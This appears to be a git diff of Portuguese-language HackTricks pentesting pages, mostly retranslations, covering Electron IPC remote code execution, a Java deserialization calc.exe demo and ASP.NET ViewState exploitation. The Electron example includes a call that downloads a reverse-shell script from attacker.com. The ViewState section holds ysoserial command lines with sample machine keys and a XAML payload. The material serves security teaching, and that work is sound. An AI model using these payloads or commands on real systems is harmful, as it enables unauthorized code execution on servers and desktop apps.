Se você faz parte da equipe azul ou é um administrador do Artifactory, até agora você deve ter uma ideia bastante clara do que fazer:
* mantenha o Artifactory atualizado, especialmente quando atualizações críticas são emitidas
* implemente uma política de senha sólida (sem senhas padrão, senhas fortes obrigatórias, bloqueios), preferencialmente delegada a um LDAP externo para melhor supervisão
* restrinja acessos (respeite o princípio do menor privilégio), especialmente para o usuário anônimo
**Confira este post:** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

40
network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
View file

@ -1,26 +1,26 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
Se o script de preload expõe um endpoint IPC do arquivo `main.js`, o processo do renderer será capaz de acessá-lo e, se vulnerável, um RCE pode ser possível.
Se o script de pré-carregamento expõe um ponto de extremidade IPC do arquivo `main.js`, o processo de renderização poderá acessá-lo e, se vulnerável, uma RCE pode ser possível.
**Todos esses exemplos foram retirados daqui** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo)
**Todos esses exemplos foram retirados daqui** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Verifique o vídeo para mais informações.
# Exemplo 1
Verifique como o `main.js` escuta em `getUpdate` e irá **baixar e executar qualquer URL** passada.\
Veja também como `preload.js` **expõe qualquer evento IPC** do main.
Verifique como o `main.js` escuta `getUpdate` e irá **baixar e executar qualquer URL** passado.\
Verifique também como `preload.js` **expõe qualquer evento IPC** do main.
```javascript
// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
@ -78,7 +78,7 @@ electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
```
# Exemplo 2
Se o script de pré-carregamento expõe diretamente ao renderizador uma maneira de chamar shell.openExternal, é possível obter RCE.
Se o script de pré-carregamento expõe diretamente ao renderizador uma forma de chamar shell.openExternal, é possível obter RCE.
```javascript
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
@ -87,7 +87,7 @@ shell.openExternal(url);
```
# Exemplo 3
Se o script de pré-carregamento expõe maneiras de se comunicar completamente com o processo principal, um XSS poderá enviar qualquer evento. O impacto disso depende do que o processo principal expõe em termos de IPC.
Se o script de pré-carregamento expõe maneiras de se comunicar completamente com o processo principal, um XSS será capaz de enviar qualquer evento. O impacto disso depende do que o processo principal expõe em termos de IPC.
```javascript
window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb);
@ -99,14 +99,14 @@ ipcRenderer.send(event, data);
```
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

167
pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
View file

@ -1,100 +1,113 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras maneiras de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
Neste POST, será explicado um exemplo usando java.io.Serializable.
Neste POST será explicado um exemplo usando `java.io.Serializable`.
# Serializable
A interface Java `Serializable` (`java.io.Serializable` é uma interface marcadora que suas classes devem implementar se elas forem ser **serializadas** e **desserializadas**. A serialização de objetos Java (escrita) é feita com o [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) e a desserialização (leitura) é feita com o [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html).
A interface Java `Serializable` (`java.io.Serializable` é uma interface marcadora que suas classes devem implementar se forem **serializadas** e **desserializadas**. A serialização de objetos Java (escrita) é feita com o [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) e a desserialização (leitura) é feita com o [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html).
Vamos ver um exemplo com uma **classe Person** que é **serializável**. Esta classe **sobrescreve a função readObject**, então quando **qualquer objeto** desta **classe** é **desserializado**, esta **função** será **executada**.\
No exemplo, a **função readObject** da classe Person chama a função `eat()` de seu animal de estimação e a função `eat()` de um cachorro (por alguma razão) chama um **calc.exe**. **Vamos ver como serializar e desserializar um objeto Person para executar esta calculadora:**
No exemplo, a **função readObject** da classe Person chama a função `eat()` de seu animal de estimação e a função `eat()` de um Cachorro (por algum motivo) chama um **calc.exe**. **Vamos ver como serializar e desserializar um objeto Person para executar esta calculadora:**
**O exemplo a seguir é de [https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649](https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649)**
```java
import java.io.Serializable;
import java.io.*;
public class TestDeserialization {
interface Animal {
public void eat();
}
//Class must implements Serializable to be serializable
public static class Cat implements Animal,Serializable {
@Override
public void eat() {
System.out.println("cat eat fish");
}
}
//Class must implements Serializable to be serializable
public static class Dog implements Animal,Serializable {
@Override
public void eat() {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
e.printStackTrace();
}
System.out.println("dog eat bone");
}
}
//Class must implements Serializable to be serializable
public static class Person implements Serializable {
private Animal pet;
public Person(Animal pet){
this.pet = pet;
}
//readObject implementation, will call the readObject from ObjectInputStream and then call pet.eat()
private void readObject(java.io.ObjectInputStream stream)
throws IOException, ClassNotFoundException {
pet = (Animal) stream.readObject();
pet.eat();
}
}
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
public static void main(String[] args) throws Exception {
// Example to call Person with a Dog
Animal animal = new Dog();
Person person = new Person(animal);
GeneratePayload(person,"test.ser");
payloadTest("test.ser");
// Example to call Person with a Cat
//Animal animal = new Cat();
//Person person = new Person(animal);
//GeneratePayload(person,"test.ser");
//payloadTest("test.ser");
}
interface Animal {
public void eat();
}
//Class must implements Serializable to be serializable
public static class Cat implements Animal,Serializable {
@Override
public void eat() {
System.out.println("cat eat fish");
}
}
//Class must implements Serializable to be serializable
public static class Dog implements Animal,Serializable {
@Override
public void eat() {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
e.printStackTrace();
}
System.out.println("dog eat bone");
}
}
//Class must implements Serializable to be serializable
public static class Person implements Serializable {
private Animal pet;
public Person(Animal pet){
this.pet = pet;
}
//readObject implementation, will call the readObject from ObjectInputStream and then call pet.eat()
private void readObject(java.io.ObjectInputStream stream)
throws IOException, ClassNotFoundException {
pet = (Animal) stream.readObject();
pet.eat();
}
}
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
public static void main(String[] args) throws Exception {
// Example to call Person with a Dog
Animal animal = new Dog();
Person person = new Person(animal);
GeneratePayload(person,"test.ser");
payloadTest("test.ser");
// Example to call Person with a Cat
//Animal animal = new Cat();
//Person person = new Person(animal);
//GeneratePayload(person,"test.ser");
//payloadTest("test.ser");
}
}
```
Este exemplo foi retirado de [https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649](https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649)
## Conclusão
Como você pode ver neste exemplo muito básico, a "vulnerabilidade" aqui aparece porque a função **readObject** está **chamando outras funções vulneráveis**.
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

257
pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
View file

@ -1,256 +1,15 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras maneiras de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
**O conteúdo deste post foi extraído de** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
# Introdução
As aplicações web ASP.NET usam o ViewState para manter o estado de uma página e persistir dados em um formulário web.
Normalmente, é possível **executar código em um servidor web onde um ViewState válido pode ser forjado**. Isso pode ser feito quando a funcionalidade de **validação MAC** foi **desativada** ou conhecendo:
* **Chave de validação e seu algoritmo** **antes** da versão do .NET Framework **4.5**
* **Chave de validação, algoritmo de validação, chave de descriptografia e algoritmo de descriptografia** na versão do .NET Framework 4.5 ou superior
Para evitar ataques de manipulação, o .NET Framework pode **assinar e criptografar** o ViewState que foi serializado usando a classe `LosFormatter`. Em seguida, verifica a assinatura usando o mecanismo de validação de código de autenticação de mensagem (MAC). A classe `ObjectStateFormatter` realiza as tarefas de assinatura, criptografia e verificação. As **chaves necessárias para executar o mecanismo de assinatura e/ou criptografia** podem ser armazenadas na seção `machineKey` dos arquivos **`web.config`** (nível de aplicativo) ou **`machine.config`** (nível de máquina). Isso é normalmente o caso quando vários servidores web são usados para servir a mesma aplicação, muitas vezes atrás de um balanceador de carga em uma fazenda ou cluster da Web. O seguinte mostra o formato da seção `machineKey` em um arquivo de configuração de uma aplicação ASP.NET que usa a versão do .NET Framework 2.0 ou superior:
```markup
<machineKey validationKey="[String]" decryptionKey="[String]" validation="[SHA1 | MD5 | 3DES | AES | HMACSHA256 | HMACSHA384 | HMACSHA512 | alg:algorithm_name]" decryption="[Auto | DES | 3DES | AES | alg:algorithm_name]" />
<machineKey validationKey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" decryptionKey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" validation="SHA1" decryption="AES" />
```
É importante notar que quando a seção `machineKey` não foi definida nos arquivos de configuração ou quando os atributos `validationKey` e `decryptionKey` foram definidos como `AutoGenerate`, **a aplicação gera os valores necessários dinamicamente** com base em um segredo criptograficamente aleatório. Os algoritmos também podem ser selecionados automaticamente. Atualmente, na versão mais recente do .NET Framework, o algoritmo de validação padrão é `HMACSHA256` e o algoritmo de descriptografia padrão é `AES`. Consulte [\[13\]](https://docs.microsoft.com/en-us/dotnet/api/system.web.configuration.machinekeysection) para mais detalhes.
# RCE com validação de ViewState MAC desativada
No passado, era possível **desativar a validação do MAC** simplesmente definindo a propriedade `enableViewStateMac` como `False`. A Microsoft lançou um patch em setembro de 2014 [\[3\]](https://devblogs.microsoft.com/aspnet/farewell-enableviewstatemac/) para impor a validação do MAC, ignorando essa propriedade em todas as versões do .NET Framework. Embora alguns de nós possam acreditar que "_o ViewState MAC não pode mais ser desativado_" [\[4\]](https://www.owasp.org/index.php/Anti\_CSRF\_Tokens\_ASP.NET), ainda é possível desativar a função de validação do MAC definindo a chave do registro `AspNetEnforceViewStateMac` como zero em:
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
```
Alternativamente, adicionar a seguinte **configuração perigosa** ao arquivo `web.config` de nível de aplicativo pode desativar a validação MAC também:
```markup
<configuration>
<appSettings>
<add key="aspnet:AllowInsecureDeserialization" value="true" />
</appSettings>
</configuration>
```
{% hint style="danger" %}
Quando a validação MAC do ViewState foi **desativada**, o projeto [YSoSerial.Net](https://github.com/pwntester/ysoserial.net) pode ser usado para gerar payloads `LosFormatter` como o ViewState para executar código arbitrário no servidor.
{% endhint %}
**Antes** da versão do .NET Framework **4.5**, o parâmetro `__VIEWSTATE` poderia ser **criptografado enquanto a validação MAC estava desativada**. Deve-se notar que **a maioria** dos **scanners** **não tenta** enviar um parâmetro ViewState não criptografado para identificar essa vulnerabilidade. Como resultado, é necessário fazer **testes manuais** para verificar se a validação MAC está desativada quando o parâmetro `__VIEWSTATE` foi criptografado. Isso pode ser verificado enviando uma pequena string aleatória em base64 no parâmetro `__VIEWSTATE`. A URL a seguir mostra um exemplo:
```
https://victim.com/path/page.aspx?__VIEWSTATE=AAAA
```
Se a página alvo **responder com um erro, a validação MAC foi desativada**, caso contrário, teria suprimido a mensagem de erro de validação MAC.\
No entanto, em cenários em que você não pode ver a mensagem de erro, esse truque não funcionará.
Os scanners automatizados devem usar uma **carga útil que cause um curto atraso** no lado do servidor. Isso pode ser alcançado executando o seguinte código ASP.NET, por exemplo, para criar um atraso de 10 segundos:
```
System.Threading.Thread.Sleep(10000);
```
```bash
string xaml_payload = @"<ResourceDictionary
xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation""
xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
xmlns:System=""clr-namespace:System;assembly=mscorlib""
xmlns:Thr=""clr-namespace:System.Threading;assembly=mscorlib"">
<ObjectDataProvider x:Key=""x"" ObjectType = ""{ x:Type Thr:Thread}"" MethodName = ""Sleep"" >
<ObjectDataProvider.MethodParameters>
<System:Int32>10000</System:Int32>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>";
```
# RCE com Validação de MAC ViewState ativada
Em versões mais antigas (**anteriores à 4.5**), o Framework .NET usa a propriedade **`TemplateSourceDirectory`** [\[15\]](https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.control.templatesourcedirectory) ao **assinar** um objeto serializado. **Desde** a versão **4.5**, no entanto, ele usa as strings **`Purpose`** para criar o hash. Ambos os mecanismos **exigem o caminho de destino a partir do diretório raiz do aplicativo** e o **nome da página**. Esses parâmetros podem ser **extraídos da URL**.
Aplicações que usam um **framework mais antigo** e impõem a criptografia do ViewState ainda podem **aceitar um ViewState assinado sem criptografia**. Isso significa que **conhecer a chave de validação e seu algoritmo é suficiente** para explorar um site. Parece que o ViewState é criptografado por padrão **desde a versão 4.5**, mesmo quando a propriedade `viewStateEncryptionMode` foi definida como `Never`. Isso significa que nas últimas versões do Framework .NET, a **chave de descriptografia e seu algoritmo também são necessários** para criar um payload.
O ViewState ASP.NET contém uma propriedade chamada `ViewStateUserKey` [\[16\]](https://docs.microsoft.com/en-us/previous-versions/dotnet/articles/ms972969\(v=msdn.10\)) que pode ser usada para mitigar os riscos de ataques de falsificação de solicitação entre sites (CSRF) [\[4\]](https://www.owasp.org/index.php/Anti\_CSRF\_Tokens\_ASP.NET). O valor da propriedade **`ViewStateUserKey`** (quando não é `null`**) também é usado durante o processo de assinatura do ViewState**. Embora não conhecer o valor desse parâmetro possa interromper nosso ataque, **seu valor geralmente pode ser encontrado nos cookies ou em um parâmetro de entrada oculto** ([\[17\]](https://software-security.sans.org/developer-how-to/developer-guide-csrf) mostra um exemplo implementado).
## Plugins ViewState YSoSerial.Net
No YSoSerial.Net master e no YSoSerial.Netv2, você pode encontrar um plugin ([**este**](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Plugins/ViewStatePlugin.cs) e [**este**](https://github.com/pwntester/ysoserial.net/blob/v2/ysoserial/Plugins/ViewStatePlugin.cs)) para explorar essa técnica quando todas as informações são conhecidas.
### **Para o Framework .NET >= 4.5:**
```bash
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
```
### **Para .NET Framework <= 4.0 (legado):**
_A chave de descriptografia e seu algoritmo não são necessários aqui:_
```bash
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
```
_Além de usar diferentes gadgets, é possível usar o parâmetro `__VIEWSTATEGENERATOR` **em vez de fornecer os caminhos**:_
```bash
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --generator=93D20A1B --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
```
Por padrão, ele usa o gadget ActivitySurrogateSelector que requer a compilação da classe ExploitClass.cs no projeto YSoSerial.Net. A carga útil do ViewState também pode ser **criptografada** para evitar os WAFs quando o valor decryptionKey é conhecido:
```bash
.\ysoserial.exe -p ViewState -c "foo to use ActivitySurrogateSelector" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --islegacy --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --isencrypted --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
```
{% hint style="info" %}
**Nota:** Devido à natureza dos gadgets usados no YSoSerial.Net, a página ASP.NET alvo sempre responde com um erro, mesmo quando um exploit foi executado com sucesso no lado do servidor.
{% endhint %}
### Caminho da aplicação
É importante encontrar a raiz do caminho da aplicação para criar um ViewState válido, a menos que:
